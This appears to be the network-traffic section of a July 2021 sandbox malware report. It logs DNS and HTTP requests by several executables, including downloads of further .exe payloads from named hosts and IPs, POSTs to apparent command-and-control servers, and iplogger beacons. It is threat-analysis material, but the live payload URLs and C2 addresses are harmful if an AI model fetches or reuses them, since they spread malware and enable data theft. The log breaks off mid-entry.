                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lE6YmT3IkBdRduLRGyyEV9JEbWxuO78Abl59P0oNPVUqIP7ykWkfK%2F8%2BuUYCoDa6OjaXg8febW4LpSHixaE6a1iP9NAEE24rKpb%2BZjELLwpVYQaASZDn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c530839ff500ac-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://101.36.107.74/seemorebty/il.php?e=FD49
                                                                                          FD49.exe
                                                                                          Remote address:
                                                                                          101.36.107.74:80
                                                                                          Request
                                                                                          GET /seemorebty/il.php?e=FD49 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Referer: https://www.facebook.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                          Host: 101.36.107.74
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:07 GMT
                                                                                          Server: Apache/2.4.37 (centos)
                                                                                          X-Powered-By: PHP/7.2.24
                                                                                          Content-Length: 0
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          requested404.com
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          requested404.com
                                                                                          IN A
                                                                                          Response
                                                                                          requested404.com
                                                                                          IN A
                                                                                          63.250.33.126
                                                                                        • flag-unknown
                                                                                          HEAD
                                                                                          http://requested404.com/C_Pirlo/I-Record.exe
                                                                                          FEF0.tmp
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          HEAD /C_Pirlo/I-Record.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                          Host: requested404.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:08 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:05:46 GMT
                                                                                          ETag: "52e00-5c6b21b2eb43a"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 339456
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/C_Pirlo/I-Record.exe
                                                                                          FEF0.tmp
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /C_Pirlo/I-Record.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                          Host: requested404.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:08 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:05:46 GMT
                                                                                          ETag: "52e00-5c6b21b2eb43a"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 339456
                                                                                          Keep-Alive: timeout=5, max=99
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://95.213.144.186:8080/3.php
                                                                                          Remote address:
                                                                                          95.213.144.186:8080
                                                                                          Request
                                                                                          GET /3.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 95.213.144.186:8080
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:09 GMT
                                                                                          Server: Apache/2.4.37 (centos)
                                                                                          X-Powered-By: PHP/7.2.24
                                                                                          Content-Transfer-Encoding: Binary
                                                                                          Content-disposition: attachment; filename="tnjkhve4kq1pu.exe"
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.zzepms.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.zzepms.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.zzepms.com
                                                                                          IN A
                                                                                          103.155.92.96
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.zzepms.com/askhelp51/askinstall51.exe
                                                                                          Remote address:
                                                                                          103.155.92.96:80
                                                                                          Request
                                                                                          GET /askhelp51/askinstall51.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: www.zzepms.com
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                          Location: http://www.zzepms.com/askinstall51.exe
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.zzepms.com/askinstall51.exe
                                                                                          Remote address:
                                                                                          103.155.92.96:80
                                                                                          Request
                                                                                          GET /askinstall51.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: www.zzepms.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:10 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 1484288
                                                                                          Last-Modified: Tue, 06 Jul 2021 03:01:10 GMT
                                                                                          Connection: keep-alive
                                                                                          ETag: "60e3c776-16a600"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          bitbucket.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          bitbucket.org
                                                                                          IN A
                                                                                          Response
                                                                                          bitbucket.org
                                                                                          IN A
                                                                                          104.192.141.1
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://bitbucket.org/globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe
                                                                                          Remote address:
                                                                                          104.192.141.1:443
                                                                                          Request
                                                                                          GET /globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: bitbucket.org
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                          Server: nginx
                                                                                          X-Usage-Quota-Remaining: 998976.884
                                                                                          Vary: Accept-Language, Origin
                                                                                          X-Usage-Request-Cost: 1040.07
                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          X-B3-TraceId: 23c77726cf5c1872
                                                                                          X-Usage-Output-Ops: 0
                                                                                          X-Dc-Location: Micros
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Date: Fri, 09 Jul 2021 23:04:13 GMT
                                                                                          bbr1repopath: /data/c03/n03/p/vp1186/data/d-702/r-90510702
                                                                                          X-Usage-User-Time: 0.025168
                                                                                          X-Usage-System-Time: 0.006034
                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22
                                                                                          X-Served-By: 2e22f7057048
                                                                                          Expires: Fri, 09 Jul 2021 23:04:13 GMT
                                                                                          Content-Language: en
                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                          X-Static-Version: f512e77453d0
                                                                                          X-Render-Time: 0.0588738918304
                                                                                          Connection: keep-alive
                                                                                          X-Usage-Input-Ops: 0
                                                                                          X-Request-Count: 1253
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Version: f512e77453d0
                                                                                          X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                          Content-Length: 0
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          IN A
                                                                                          Response
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-1-w.amazonaws.com
                                                                                          s3-1-w.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-w.us-east-1.amazonaws.com
                                                                                          s3-w.us-east-1.amazonaws.com
                                                                                          IN A
                                                                                          52.216.138.243
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.listincode.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.listincode.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.listincode.com
                                                                                          IN A
                                                                                          144.202.76.47
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.listincode.com/
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          144.202.76.47:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                          Host: www.listincode.com
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:17 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 2
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.4.45
                                                                                          Access-Control-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22
                                                                                          Remote address:
                                                                                          52.216.138.243:443
                                                                                          Request
                                                                                          GET /fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: bbuseruploads.s3.amazonaws.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          x-amz-id-2: uCGl9BaST5TvIR54pJVgx59iZwOFRhz7CtjdkOC3FEj8OQ9iBAv1Sa0R0+1JK/riu8DAVWqIxUk=
                                                                                          x-amz-request-id: 9C2KGWSRQGDHD6RD
                                                                                          Date: Fri, 09 Jul 2021 23:04:14 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:44 GMT
                                                                                          ETag: "84594c9b7bbd67dd00d62c1dce396b3e"
                                                                                          x-amz-version-id: I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z
                                                                                          Content-Disposition: attachment; filename="JointerPokerish_2021-07-07_19-21.exe"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: application/x-msdownload
                                                                                          Server: AmazonS3
                                                                                          Content-Length: 360960
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://93.157.63.171/filename.exe
                                                                                          Remote address:
                                                                                          93.157.63.171:80
                                                                                          Request
                                                                                          GET /filename.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 93.157.63.171
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:15 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 551424
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=60
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:00:01 GMT
                                                                                          ETag: "86a00-5c6b8bb4405b5"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          connectini.net
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          connectini.net
                                                                                          IN A
                                                                                          Response
                                                                                          connectini.net
                                                                                          IN A
                                                                                          162.0.210.44
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          https://connectini.net/Series/SuperNitou.php
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          162.0.210.44:443
                                                                                          Request
                                                                                          POST /Series/SuperNitou.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: connectini.net
                                                                                          Content-Length: 51
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          X-Powered-By: PleskLin
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          statuse.digitalcertvalidation.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          statuse.digitalcertvalidation.com
                                                                                          IN A
                                                                                          Response
                                                                                          statuse.digitalcertvalidation.com
                                                                                          IN CNAME
                                                                                          ocsp.digicert.com
                                                                                          ocsp.digicert.com
                                                                                          IN CNAME
                                                                                          cs9.wac.phicdn.net
                                                                                          cs9.wac.phicdn.net
                                                                                          IN A
                                                                                          72.21.91.29
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          72.21.91.29:80
                                                                                          Request
                                                                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: statuse.digitalcertvalidation.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Accept-Ranges: bytes
                                                                                          Age: 4389
                                                                                          Cache-Control: max-age=144574
                                                                                          Content-Type: application/ocsp-response
                                                                                          Date: Fri, 09 Jul 2021 23:04:16 GMT
                                                                                          Etag: "60e85689-1d7"
                                                                                          Expires: Sun, 11 Jul 2021 15:13:50 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 14:00:41 GMT
                                                                                          Server: ECS (bsa/EB1C)
                                                                                          X-Cache: HIT
                                                                                          Content-Length: 471
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iplogger.org
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          Response
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          88.99.66.31
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/1Cr3a7
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /1Cr3a7 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                          Host: iplogger.org
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:23 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=q0igm3d82egrb4dpns22h63ec1; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176328; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: 4dc06e46e01f945b2bfd459497806efb5b1d16cb37f57e11cddf0c0a55f54a60
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          requested404.com
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          requested404.com
                                                                                          IN A
                                                                                          Response
                                                                                          requested404.com
                                                                                          IN A
                                                                                          63.250.33.126
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/Widgets/i-record.exe
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /Widgets/i-record.exe HTTP/1.1
                                                                                          Host: requested404.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:22 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Thu, 01 Jul 2021 15:26:11 GMT
                                                                                          ETag: "5c67eb-5c611757b12c7"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 6055915
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/products/bita3elcpm/esskm3392gysubeu.exe
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /products/bita3elcpm/esskm3392gysubeu.exe HTTP/1.1
                                                                                          Host: requested404.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:26 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:20:59 GMT
                                                                                          ETag: "5ce00-5c6b251a3910c"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 380416
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/products/Sabbeb/a3er3tvh9s2hkm7n.exe
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /products/Sabbeb/a3er3tvh9s2hkm7n.exe HTTP/1.1
                                                                                          Host: requested404.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:26 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:22:35 GMT
                                                                                          ETag: "6f800-5c6b25754a032"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 456704
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/products/Hand/3b7m4byc3rpeb3wu.exe
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /products/Hand/3b7m4byc3rpeb3wu.exe HTTP/1.1
                                                                                          Host: requested404.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:28 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:22:08 GMT
                                                                                          ETag: "6e800-5c6b255c453d1"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 452608
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.iyiqian.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.iyiqian.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.iyiqian.com
                                                                                          IN A
                                                                                          103.155.92.58
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.iyiqian.com/
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          103.155.92.58:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                          Host: www.iyiqian.com
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 15
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.tinyore.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.tinyore.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.tinyore.com
                                                                                          IN A
                                                                                          188.225.87.175
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://www.tinyore.com/Home/Index/lkdinl
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          188.225.87.175:80
                                                                                          Request
                                                                                          POST /Home/Index/lkdinl HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                          Host: www.tinyore.com
                                                                                          Content-Length: 285
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                          Set-Cookie: PHPSESSID=9qhr2r99rc9eoujmgdgncdevo6; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          Pragma: no-cache
                                                                                          Access-Control-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          privateinvestig8tor.com
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          privateinvestig8tor.com
                                                                                          IN A
                                                                                          Response
                                                                                          privateinvestig8tor.com
                                                                                          IN A
                                                                                          162.0.220.187
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 180
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 59
                                                                                          Date: Fri, 09 Jul 2021 23:04:29 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iplogger.org
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          Response
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          88.99.66.31
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/1CHPp7
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /1CHPp7 HTTP/1.1
                                                                                          Host: iplogger.org
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:30 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=pmfmih06of3kmaof5b6up1g243; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176321; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://185.53.46.82:3214/
                                                                                          1D88.exe
